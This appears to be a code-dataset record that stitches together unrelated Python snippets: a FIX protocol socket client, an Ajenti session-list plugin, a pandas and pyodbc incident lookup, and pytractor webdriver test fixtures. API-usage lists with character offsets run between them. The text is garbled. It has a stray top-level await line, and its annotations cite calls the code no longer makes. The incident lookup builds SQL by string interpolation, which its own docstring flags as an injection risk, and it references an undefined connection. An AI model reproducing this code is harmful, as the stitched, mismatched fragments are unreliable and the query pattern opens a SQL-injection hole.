                await self.expectedHeartbeat(self._config.getint('HeartBeatInterval'))
            else:
                # Logged out but still connected: attempt to log on again.
                await self.logon()
await self.logon()
class FIXClient:
    """Owns the socket connection for a FIX session and the FixEngine on top of it."""

    def __init__(self, configFile, gateway, listener):
        self._config = self.loadConfig(configFile, gateway)
        self._reader = None
        self._writer = None
        self._client = None
        self._messageListener = listener

    async def startClient(self, loop):
        """ Creates Socket Connection and Runs Main Loop.

        ``loop`` is kept for backward compatibility but no longer forwarded:
        the explicit ``loop`` argument to asyncio.open_connection was
        deprecated in 3.8 and removed in Python 3.10; the connection is
        opened on the running event loop.
        """
        self._reader, self._writer = await asyncio.open_connection(self._config["SocketHost"], self._config["SocketPort"])
        self._connectionState = SocketConnectionState.CONNECTED
        self._client = FixEngine(self._config, self._reader, self._writer, self._messageListener)

    def loadConfig(self, filePath, gateway):
        """Load the [gateway] section from an INI file; raise if the section is missing."""
        # SafeConfigParser was a deprecated alias and was removed in Python 3.12.
        parser = configparser.ConfigParser()
        parser.read(filePath)
        if parser.has_section(gateway):
            return parser[gateway]
        raise Exception(f"{gateway} section not found in configuration file {filePath}")

    def getClient(self):
        # FixEngine instance, or None until startClient() has run.
        return self._client
"configparser.SafeConfigParser",
"asyncio.open_connection",
"connectionHandler.FIXConnectionHandler.__init__"
] | [((1479, 1555), 'connectionHandler.FIXConnectionHandler.__init__', 'FIXConnectionHandler.__init__', (['self', 'config', 'reader', 'writer', 'messageListener'], {}), '(self, config, reader, writer, messageListener)\n', (1508, 1555), False, 'from connectionHandler import FIXConnectionHandler, SocketConnectionState\n'), ((5465, 5496), 'configparser.SafeConfigParser', 'configparser.SafeConfigParser', ([], {}), '()\n', (5494, 5496), False, 'import configparser\n'), ((5149, 5244), 'asyncio.open_connection', 'asyncio.open_connection', (["self._config['SocketHost']", "self._config['SocketPort']"], {'loop': 'loop'}), "(self._config['SocketHost'], self._config[\n 'SocketPort'], loop=loop)\n", (5172, 5244), False, 'import asyncio\n')] |
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.auth import authorize
from aj.api.endpoint import endpoint, EndpointError
import aj
import gevent
@component(HttpPlugin)
class Handler(HttpPlugin):
    """HTTP plugin exposing the list of currently active sessions."""

    def __init__(self, context):
        self.context = context

    @url(r'/api/session_list/list')
    @endpoint(api=True)
    def handle_api_list_sessions(self, http_context):
        """Refresh and return the global session registry (GET only)."""
        if http_context.method != 'GET':
            return None
        # Ask the worker to rebuild the list, then give it a moment to
        # finish before reading the shared state.
        self.context.worker.update_sessionlist()
        gevent.sleep(1)
        return aj.sessions
| [
"gevent.sleep",
"aj.api.http.url",
"jadi.component",
"aj.api.endpoint.endpoint"
] | [((176, 197), 'jadi.component', 'component', (['HttpPlugin'], {}), '(HttpPlugin)\n', (185, 197), False, 'from jadi import component\n'), ((295, 324), 'aj.api.http.url', 'url', (['"""/api/session_list/list"""'], {}), "('/api/session_list/list')\n", (298, 324), False, 'from aj.api.http import url, HttpPlugin\n'), ((331, 349), 'aj.api.endpoint.endpoint', 'endpoint', ([], {'api': '(True)'}), '(api=True)\n', (339, 349), False, 'from aj.api.endpoint import endpoint, EndpointError\n'), ((510, 525), 'gevent.sleep', 'gevent.sleep', (['(1)'], {}), '(1)\n', (522, 525), False, 'import gevent\n')] |
import pandas as pd
import os
#opt = itertools.islice(ls, len(ls))
#st = map(lambda x : )
def parsecode(txt, csv_path=None):
    """Extract known tracking codes from *txt*.

    The set of known codes is loaded from the 'Code' column of a CSV file
    (by default ``OMDB.csv`` in the current working directory).  For every
    known code present in the text, the 7-character slice starting at the
    match is collected and the matched code is removed from the working
    text before the next lookup.

    Quirk preserved from the original implementation: scanning stops at
    the FIRST known code that is absent from the text.

    Args:
        txt: Text to scan (codes are matched case-sensitively).
        csv_path: Optional path to the code CSV.  Defaults to
            ``<cwd>/OMDB.csv``, matching the original behavior.

    Returns:
        A list of matched 7-character code strings, or '' when nothing
        matched.
    """
    if csv_path is None:
        # Bug fix: the original concatenated a literal '\\' separator,
        # which only works on Windows; os.path.join is portable.
        csv_path = os.path.join(os.getcwd(), 'OMDB.csv')
    # NOTE: the CSV is re-read on every call; cache it if this gets hot.
    known_codes = pd.read_csv(csv_path)['Code'].to_list()
    matches = []
    hits = 0
    for known in known_codes:
        if known in txt:
            start = txt.find(known)
            matches.append(txt[start:start + 7])
            txt = txt.replace(known, '')
            hits = hits + 1
        else:
            # Original behavior: bail out on the first missing code.
            return matches if hits else ''
    # Bug fix: the original fell off the loop and implicitly returned None
    # when every known code matched; return the collected codes instead.
    return matches if hits else ''
def qry_by_code(code, tbl = None, col = None):
    """Build the incident-tracker lookup SQL for one tracking *code*.

    Only the default form (tbl and col both None) is implemented; any
    other combination yields an empty string.

    WARNING: the query is assembled by string interpolation, so *code*
    must come from a trusted source (SQL-injection risk).
    """
    if tbl is not None or col is not None:
        return ""
    select_part = (
        "select Incident_Notification,Down_Time,Up_Time,Major_Cause,"
        "Action_Taken,Link_ID_Site_ID,Incident_ID"
        " from incident_tracker_v2 where ("
    )
    filter_part = (
        f" No_of_2G_Impacted_sites Like '%{code}%'"
        f" or No_of_3G_Impacted_sites like '%{code}%'"
        f" or No_of_4G_Impacted_Sites like '%{code}%'"
        f" or Incident_Notification Like '%{code}%')"
    )
    return select_part + filter_part + " order by Down_Time desc"
def codechk(txt):
    """Look up recent incidents for a tracking code embedded in *txt*.

    The text is upper-cased and scanned with parsecode(); processing only
    continues when exactly one code was extracted.  The incident tracker
    database is then queried and up to the three most recent incidents
    are formatted into a report string.

    Returns:
        A formatted report string, or 0 when no single code was found,
        the code is malformed, or the lookup failed.
    """
    rs = parsecode(txt.upper())
    st = 0
    print('ret val', rs)
    # Robustness fix: parsecode() may return '' (or, historically, None);
    # anything but exactly one extracted code means there is no lookup to
    # do.  The old `len(rs)` crashed on None.
    if not rs or len(rs) != 1:
        return st
    code = rs[0]
    try:
        int(code[6:7])  # validate: 7th character of the code must be a digit
        qry = qry_by_code(code)
        # NOTE(review): `soc` (connection string) and `pyodbc` are defined
        # elsewhere in this module - confirm before relying on this path.
        conn = pyodbc.connect(soc)
        try:
            # Bug fix: pandas has no pd.read(); pd.read_sql() executes the
            # query (the old AttributeError was hidden by the bare except).
            df = pd.read_sql(qry, con=conn)
        finally:
            # Bug fix: the connection was never closed.
            conn.close()
        if df.shape[0] != 0:
            if df.shape[0] > 3:
                # Bug fix: df.shape[0] is an int and must be str()-ed
                # before concatenation (the old code raised TypeError,
                # silently swallowed by the bare except).
                st = "last 3 incident out of " + str(df.shape[0])
                rn = 3
            else:
                st = "incident found " + str(df.shape[0]) + chr(10)
                rn = df.shape[0]
            for i in range(rn):
                tmp = chr(10)
                for j in df:  # iterating a DataFrame yields column names
                    tmp = tmp + chr(10) + str(df.loc[i, j])
                # (the original used a pointless for/else here; with no
                # break the else body always ran once per row)
                st = st + chr(10) + str(i) + tmp
    except Exception:
        # Narrowed from a bare `except:`; lookup stays best-effort.
        print('not code')
    return st
| [
"pandas.read",
"os.getcwd"
] | [((135, 146), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (144, 146), False, 'import os\n'), ((1379, 1401), 'pandas.read', 'pd.read', (['qry'], {'con': 'conn'}), '(qry, con=conn)\n', (1386, 1401), True, 'import pandas as pd\n')] |
import socket
import unittest
from eats.webdriver import PytractorWebDriver
from eats.tests.common import SimpleWebServerProcess as SimpleServer
def _get_local_ip_addr():
    """Return the local machine's outbound IPv4 address.

    Connecting a UDP socket transmits no packets; it only selects the
    interface that would route to the target, whose address is then read
    back with getsockname().  Requires DNS resolution of "gmail.com".
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Bug fix: close the socket even when connect() raises (the original
    # leaked the file descriptor on error).
    try:
        s.connect(("gmail.com", 80))
        return s.getsockname()[0]
    finally:
        s.close()
class PytractorTestBaseSetup(unittest.TestCase):
    """Shared fixture for the pytractor webdriver tests.

    Boots the demo web server once per test class and hands every test a
    fresh driver; concrete subclasses supply get_driver().
    """

    @classmethod
    def setUpClass(cls):
        """Start the demo HTTP server before the first test runs."""
        cls.process = SimpleServer()
        cls.process.run()

    @classmethod
    def tearDownClass(cls):
        """Shut the demo HTTP server down after the last test."""
        cls.process.stop()

    def setUp(self):
        """Create a driver pointed at the server, with synchronization on."""
        host = _get_local_ip_addr()
        self.base_url = "http://%s:%s" % (host, SimpleServer.PORT)
        self.driver = self.get_driver()
        self.driver.ignore_synchronization = False

    def tearDown(self):
        """Dispose of the per-test driver."""
        self.driver.quit()
class FirefoxRemoteWebDriverTest(object):
    """Mixin supplying get_driver() for a remote Firefox session."""

    def get_driver(self):
        """Return a PytractorWebDriver bound to the local Selenium hub."""
        hub_url = 'http://{}:4444/wd/hub'.format(_get_local_ip_addr())
        capabilities = {'browserName': 'firefox', 'version': '', 'platform': 'ANY'}
        return PytractorWebDriver(
            test_timeout=3000,
            command_executor=hub_url,
            desired_capabilities=capabilities,
        )
class ChromeRemoteWebDriverTest(object):
    """Mixin supplying get_driver() for a remote Chrome session."""
    def get_driver(self):
        """Return a PytractorWebDriver bound to the local Selenium hub,
        requesting a Chrome browser (any version, any platform)."""
        return PytractorWebDriver(
            test_timeout=3000,
            command_executor='http://{}:4444/wd/hub'.format(_get_local_ip_addr()),
            desired_capabilities={'browserName': 'chrome', 'version': '', 'platform': 'ANY'}
        ) | [
"eats.tests.common.SimpleWebServerProcess",
"socket.socket"
] | [((180, 228), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (193, 228), False, 'import socket\n'), ((454, 468), 'eats.tests.common.SimpleWebServerProcess', 'SimpleServer', ([], {}), '()\n', (466, 468), True, 'from eats.tests.common import SimpleWebServerProcess as SimpleServer\n')] |